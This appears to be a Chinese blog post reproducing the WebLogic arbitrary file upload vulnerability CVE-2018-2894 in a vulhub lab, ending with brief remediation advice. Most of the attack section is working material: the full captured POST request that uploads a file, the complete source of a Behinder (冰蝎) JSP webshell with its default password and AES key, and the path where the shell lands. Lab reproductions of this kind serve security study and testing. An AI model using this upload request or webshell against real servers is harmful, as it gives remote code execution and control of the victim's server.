• 【漏洞复现】Weblogic 任意文件上传漏洞(CVE-2018-2894)


    漏洞简介

    Oracle在7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page在"生产模式"下默认不开启,所以该漏洞有一定限制,利用该漏洞,可以上传任意.jsp文件,进而获取服务器权限。

    影响版本

    Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。

    环境搭建

    使用vulhub的靶场环境
     

    1. 1.切到 cd /vulhub-master/weblogic/CVE-2018-2894 目录下
    2. 2.docker-compose up -d 启动漏洞环境
    3. 3.访问:http://your-ip:7001/console
    4. 如图所示,即为搭建成功。

    参考之前笔记vulhub docker靶场搭建-CSDN博客

    执行docker-compose logs | grep password可查看管理员密码,管理员用户名为:weblogic。

    登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项:

    漏洞复现

    1.访问如下链接

    http://your-ip:7001/ws_utc/config.do

    设置Work Home Dir为:

    1. 路径:
    2. /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

    2.将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要。

    3.点击安全 -> 增加,上传webshelll,这里用的是冰蝎的马,密码为rebeyond。

    4.BurpSuite抓包,得到时间戳:

    完整数据包:

    1. POST /ws_utc/resources/setting/keystore?timestamp=1652192416829 HTTP/1.1
    2. Host: 192.168.110.136:7001
    3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    6. Accept-Encoding: gzip, deflate
    7. Content-Type: multipart/form-data; boundary=---------------------------286671924331292381372054486536
    8. Content-Length: 1483
    9. Origin: http://192.168.110.136:7001
    10. Connection: close
    11. Referer: http://192.168.110.136:7001/ws_utc/config.do
    12. Cookie: pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; JSESSIONID=eMOuVkbE4I_kWIfWJVtJUmK0gVEhFnqD_z0EvOhE-EzOuzpQvWsP!-37318034
    13. Upgrade-Insecure-Requests: 1
    14. -----------------------------286671924331292381372054486536
    15. Content-Disposition: form-data; name="ks_name"
    16. weblogic
    17. -----------------------------286671924331292381372054486536
    18. Content-Disposition: form-data; name="ks_edit_mode"
    19. false
    20. -----------------------------286671924331292381372054486536
    21. Content-Disposition: form-data; name="ks_password_front"
    22. xOPp22ro
    23. -----------------------------286671924331292381372054486536
    24. Content-Disposition: form-data; name="ks_password"
    25. xOPp22ro
    26. -----------------------------286671924331292381372054486536
    27. Content-Disposition: form-data; name="ks_password_changed"
    28. true
    29. -----------------------------286671924331292381372054486536
    30. Content-Disposition: form-data; name="ks_filename"; filename="shell.jsp"
    31. Content-Type: application/octet-stream
    32. <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
    33. -----------------------------286671924331292381372054486536--

    返回安全界面,上传成功。

    4.访问上传的webshell:

    http://your-ip:7001/ws_utc/css/config/keystore/1652192470370_shell.jsp

    5.再上冰蝎

    6.进入docker容器查看一下文件

    修复方案

    1.设置config.do,begin.do页面登录授权后访问。

    2.IPS等防御产品可以加入相应的特征。

    3.升级到官方的最新版本。


     

  • 相关阅读:
    电脑待办事项提醒工具用哪个?
    关于软件开发的若干总结(2022-08-27)
    USB转串口芯片CH340系列及CH340模块使用方法(CH340驱动,接线,串口下载详细介绍)
    一文带你了解2023年最新央企名单、业务和管理机构(附资料)
    权威认可 | Smartbi为何屡获市场认可,多个权威报告给出答案
    Android进阶——Handler底层fd监听之epoll机制
    Spring有哪些注入方式呢?
    中国金控盐碱地水稻 国稻种芯-林裕豪:粮食安全两会热点
    云原生应用的未来:无服务器计算的崭露头角
    Python-网络编程中数据的打包与字节流的解包
  • 原文地址:https://blog.csdn.net/m0_69043895/article/details/138202385